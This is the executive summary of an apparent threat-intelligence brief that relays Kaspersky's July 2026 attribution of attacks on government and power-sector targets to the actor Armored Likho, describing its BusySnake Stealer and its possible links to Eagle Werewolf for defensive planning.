Executive summary
On 3 July 2026, Kaspersky published a technical analysis attributing attacks on government agencies and the electric power sector across Russia, Brazil, and Kazakhstan to a previously undocumented threat actor it tracks as Armored Likho. The group is unusual in that it blends financially motivated campaigns against private individuals with targeted cyber espionage against organisations — and its toolkit is built around obfuscated, modular RATs and infostealers specifically engineered to bypass dynamic analysis.
At the centre of the current campaign is BusySnake Stealer, a previously unreported Python-based infostealer for Windows. Beyond broad data theft, it can raise a reverse SSH tunnel to its command-and-control server (integrating what was previously a standalone utility, Go2Tunnel, directly into the malware), install or hijack RustDesk for hands-on remote access, and dynamically deliver modules tailored to the victim's profile.
Kaspersky assesses possible overlaps with Eagle Werewolf, a cluster tracked by BI.ZONE since May 2023 with a record of targeting government and defence organisations — particularly those involved in UAV development — and of distributing malware through compromised Telegram channels. The overlaps include how both AquilaRAT and BusySnake receive C2 tasks, register persistence via scheduled tasks, and use similar C2 endpoints. The actor's exact origins remain unknown.
HLD assesses this campaign as a planning-relevant signal for government and critical-infrastructure operators generally: the tradecraft — analysis-resistant Python malware, abuse of legitimate remote-access tooling, GitHub-hosted staging, and indications of AI-assisted payload development — is portable well beyond the currently observed victim geography.